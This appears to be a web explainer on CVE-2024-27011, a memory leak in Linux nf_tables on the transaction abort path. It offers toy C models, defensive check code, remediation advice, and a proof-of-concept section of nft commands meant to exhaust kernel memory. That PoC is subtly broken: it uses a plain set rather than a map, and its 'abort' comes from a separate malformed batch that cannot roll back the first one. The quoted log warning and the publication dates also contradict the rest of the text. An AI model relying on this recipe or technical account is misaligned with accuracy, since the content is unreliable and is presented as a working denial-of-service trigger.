Date Published: June 2024
Severity: Medium
Introduction
CVE-2024-27011 is a memory leak vulnerability that was found and fixed in the Linux kernel's netfilter subsystem, specifically in nf_tables. A user with CAP_NET_ADMIN privileges can trigger a reference-count error that leaks kernel memory, and repeated triggering can exhaust kernel memory locally.
In this explainer, we break down the vulnerability in plain language, demonstrate its impact, and walk through proof-of-concept exploit steps. This is exclusive research and aims to make things accessible even for readers new to kernel security.
The Vulnerability: Where It Exists
nf_tables is the packet filtering and classification framework in Linux, essentially a modern replacement for iptables. One of its advanced features is *maps*: sets whose elements associate a key with a value, such as a verdict, and which can be updated at runtime.
In affected kernels (notably those before Linux 6.9-rc4), the following sequence causes a reference miscount:
- You delete an element from a map.
- You delete the entire set right after, in the same transaction.
- If this transaction aborts (for example, because a later command in it fails), cleanup code tries to "restore" the previously deleted objects.
- However, the restore logic runs twice for the deleted element, so its reference count is incremented one time too many.
This subtle bug leads to a memory leak: the extra reference prevents the memory from ever being freed until the system is rebooted.
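The sequence above can be sketched with a toy model. This is not kernel code: the struct, the helper names, and the assumption that the abort path unwinds commands in reverse order are simplifications introduced here only to show how one reference count ends up incremented twice.

```c
#include <stdbool.h>

/* Toy model only: hypothetical types and helpers, not kernel symbols. */
struct toy_map_elem {
    bool active;   /* is the element active in the next generation? */
    int  obj_use;  /* reference count the element holds on its mapped object */
};

/* "delete element": deactivate the element and drop its reference. */
static void toy_delete_element(struct toy_map_elem *e)
{
    if (e->active) {
        e->active = false;
        e->obj_use--;
    }
}

/* "delete set": deactivates every element that is still active. */
static void toy_delete_set(struct toy_map_elem *e)
{
    toy_delete_element(e); /* no-op if the element was already deleted */
}

/* Undo "delete set": reactivate any element that is currently inactive. */
static void toy_abort_delete_set(struct toy_map_elem *e)
{
    if (!e->active) {
        e->active = true;
        e->obj_use++;
    }
}

/* Undo "delete element" the way the pre-fix code is described: no check. */
static void toy_abort_delete_element_buggy(struct toy_map_elem *e)
{
    e->active = true;
    e->obj_use++;
}

/* Runs the whole sequence and returns the final reference count. */
int toy_refcount_after_buggy_abort(void)
{
    struct toy_map_elem e = { .active = true, .obj_use = 1 };

    toy_delete_element(&e);             /* obj_use: 1 -> 0 */
    toy_delete_set(&e);                 /* element already inactive */

    /* Abort: commands are undone in reverse order (assumed). */
    toy_abort_delete_set(&e);           /* obj_use: 0 -> 1 */
    toy_abort_delete_element_buggy(&e); /* obj_use: 1 -> 2, one too many */

    return e.obj_use;
}
```

In this model the count starts at 1 and should return to 1 after a clean rollback; `toy_refcount_after_buggy_abort()` returns 2, which is the stuck reference that keeps the object from being freed.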
The root cause was addressed in this commit:
- netfilter: nf_tables: fix memleak in map from abort path
When the bug is hit, the kernel log may show a warning like:
[ 617.286929] ------------[ cut here ]------------
[ 617.286939] WARNING: CPU: 6 PID: 790302 at net/netfilter/nf_tables_api.c:2086 nf_tables_chain_destroy+0x1f7/0x220 [nf_tables]
[ ... omitted for brevity ... ]
[ 617.288483] nf_tables_trans_destroy_work+0x588/0x590 [nf_tables]
Before the fix, the abort path in nf_tables_api.c handled element deletion and set deletion by restoring state without checking whether the element's reference had already been restored. The result was a double increment of the reference count, and therefore the leak.
Problem code snippet (simplified):
/* Simplified pseudocode; the helper names are illustrative, not kernel symbols. */
if (trans->ops && trans->ops->abort)
    trans->ops->abort(trans);
else
    restore_element_state();
restore_set_state();
Patch highlights:
The fix is to _skip restoring_ if the next generation bit has already been cleared, avoiding a second (erroneous) reference increment.
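To make the effect of that check concrete, here is a minimal sketch in the same toy style. The struct and function names are hypothetical, and the model assumes that a cleared next-generation bit corresponds to "element already active again"; it is an illustration of the idea, not the actual patch.

```c
#include <stdbool.h>

/* Toy model only: hypothetical names, not the kernel's data structures. */
struct toy_elem {
    bool active_next; /* true once the next-generation bit has been cleared */
    int  obj_use;     /* reference count held on the mapped object */
};

/*
 * Abort handler for "delete element".
 * fixed == false models the pre-fix behaviour (always restore);
 * fixed == true models the patched behaviour (skip if already restored).
 */
static void toy_undo_delete_element(struct toy_elem *e, bool fixed)
{
    if (fixed && e->active_next)
        return; /* already restored by the set-level undo: skip */

    e->active_next = true;
    e->obj_use++;
}

/* Returns the reference count after the element-level undo has run. */
int toy_use_after_abort(bool fixed)
{
    /* State after the set-level restore already reactivated the element. */
    struct toy_elem e = { .active_next = true, .obj_use = 1 };

    toy_undo_delete_element(&e, fixed);
    return e.obj_use;
}
```

With `fixed` set to false the function returns 2 (the leaked reference); with `fixed` set to true it returns 1, the expected count after a clean rollback.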
Proof of Concept: Triggering the Leak
> Note: Requires CAP_NET_ADMIN and a kernel vulnerable to CVE-2024-27011 (Linux 6.9-rc3 or earlier).
We can use nft (the nftables CLI) to reenact the bug.
1. Create a problematic nftables configuration
nft add table inet test
nft add set inet test myset '{ type ipv4_addr; }'
2. Add & remove elements in a transaction
nft --debug=netlink -f - << EOF
add element inet test myset { 1.2.3.4 }
delete element inet test myset { 1.2.3.4 }
delete set inet test myset
EOF
3. Force an abort situation
To force the kernel abort path, you can (for example) run another operation that collides with the above, or inject netlink errors via a malicious tool. Or simply send a malformed batch:
nft -f - << EOF
add set inet test badset { type inet_service; }
/* Not closing the batch, or using mismatched statements */
EOF
Now, monitor kernel logs. On affected kernels, a double refcount increment and leak will occur for the mapped element.
Impact
- Local Denial of Service (DoS): An attacker can leverage repeated allocations to slowly exhaust kernel memory, causing OOM conditions or system instability.
- Prerequisites: User must have CAP_NET_ADMIN (typical for networking apps or privileged containers/LXC).
- No direct privilege escalation is possible, but the leak could be used to disrupt services or to mask other kernel memory leaks.
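Since CAP_NET_ADMIN is the key prerequisite, it can be useful to check whether a given process actually holds it. The sketch below reads the `CapEff` line from `/proc/self/status` and tests bit 12, which is the value of `CAP_NET_ADMIN` in `<linux/capability.h>`. The function names are made up for this example.

```c
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define EXAMPLE_CAP_NET_ADMIN_BIT 12 /* CAP_NET_ADMIN in <linux/capability.h> */

/* Test the CAP_NET_ADMIN bit in a hexadecimal capability mask string. */
bool mask_has_net_admin(const char *hex_mask)
{
    /* strtoull skips leading whitespace and stops at the trailing newline. */
    unsigned long long mask = strtoull(hex_mask, NULL, 16);

    return (mask >> EXAMPLE_CAP_NET_ADMIN_BIT) & 1ULL;
}

/*
 * Returns 1 if the calling process has CAP_NET_ADMIN in its effective set,
 * 0 if it does not, and -1 if /proc/self/status could not be read or parsed.
 */
int self_has_net_admin(void)
{
    char line[256];
    int result = -1;
    FILE *fp = fopen("/proc/self/status", "r");

    if (!fp)
        return -1;

    while (fgets(line, sizeof line, fp)) {
        if (strncmp(line, "CapEff:", 7) == 0) {
            result = mask_has_net_admin(line + 7) ? 1 : 0;
            break;
        }
    }
    fclose(fp);
    return result;
}
```

Running `self_has_net_admin()` inside a container is a quick way to see whether that container is in a position to reach the affected code path at all.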
Remediation
Upgrade to Linux kernel 6.9-rc4 or later. All maintained stable trees have incorporated the fix as of early June 2024.
- Upstream commit reference
- Debian Security Tracker
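As a rough first check on a host, the running kernel's release string can be compared against 6.9. The sketch below is only a coarse heuristic with hypothetical function names: it looks at the major and minor numbers alone, so it cannot tell release candidates apart from final releases and it will not notice fixes backported into older stable or distribution kernels. The distribution's security tracker remains the authoritative source.

```c
#include <stdbool.h>
#include <stdio.h>
#include <sys/utsname.h>

/*
 * Parse "major.minor" from a release string such as "6.8.0-31-generic" and
 * report whether it is at least want_major.want_minor.
 * Returns false if the string cannot be parsed.
 */
bool release_at_least(const char *release, int want_major, int want_minor)
{
    int major = 0, minor = 0;

    if (sscanf(release, "%d.%d", &major, &minor) != 2)
        return false;

    return major > want_major ||
           (major == want_major && minor >= want_minor);
}

/* Convenience wrapper around uname(2) for the running kernel. */
bool running_kernel_at_least(int want_major, int want_minor)
{
    struct utsname u;

    if (uname(&u) != 0)
        return false;

    return release_at_least(u.release, want_major, want_minor);
}
```

A `false` result from `running_kernel_at_least(6, 9)` does not prove the host is vulnerable; it only means the fix has to be confirmed through the vendor's changelog rather than the version number.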
Remove CAP_NET_ADMIN from untrusted users and containers, and monitor for excessive kernel memory usage on unpatched hosts.
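One simple way to watch for this kind of leak is to sample a kernel memory counter from `/proc/meminfo` over time. The sketch below extracts a single field by name; using `SUnreclaim` (unreclaimable slab memory) as the signal is an assumption made here, on the basis that leaked kernel objects are typically slab allocations. The function names are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/*
 * Extract the kB value for `key` (for example "SUnreclaim") from
 * /proc/meminfo-style text. Returns -1 if the key is not found.
 */
long meminfo_kb(const char *text, const char *key)
{
    size_t klen = strlen(key);
    const char *p = text;

    while (p && *p) {
        /* Match "key:" at the start of a line only. */
        if (strncmp(p, key, klen) == 0 && p[klen] == ':') {
            long kb;

            if (sscanf(p + klen + 1, "%ld", &kb) == 1)
                return kb;
            return -1;
        }
        p = strchr(p, '\n');
        if (p)
            p++; /* move to the first character of the next line */
    }
    return -1;
}

/* Read /proc/meminfo and return the kB value for `key`, or -1 on error. */
long read_meminfo_kb(const char *key)
{
    char buf[8192];
    size_t n;
    FILE *fp = fopen("/proc/meminfo", "r");

    if (!fp)
        return -1;

    n = fread(buf, 1, sizeof buf - 1, fp);
    fclose(fp);
    buf[n] = '\0';

    return meminfo_kb(buf, key);
}
```

Calling `read_meminfo_kb("SUnreclaim")` at intervals and alerting on steady growth that never recedes gives a coarse signal; it cannot attribute the growth to nf_tables specifically.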
Conclusion
CVE-2024-27011 is a subtle memory leak in the Linux nf_tables code affecting kernels before 6.9-rc4, allowing privileged users to cause persistent kernel memory leaks. While it doesn't allow privilege escalation or remote code execution, administrators should patch promptly to avoid possible DoS from local actors.
If you want to contribute a more robust local exploit, or see the bug in action on pre-patched kernels, examine the abort paths in nftables and look at netlink transaction rollbacks!
Timeline
Published on: 05/01/2024 06:15:19 UTC
Last modified on: 12/23/2024 14:06:38 UTC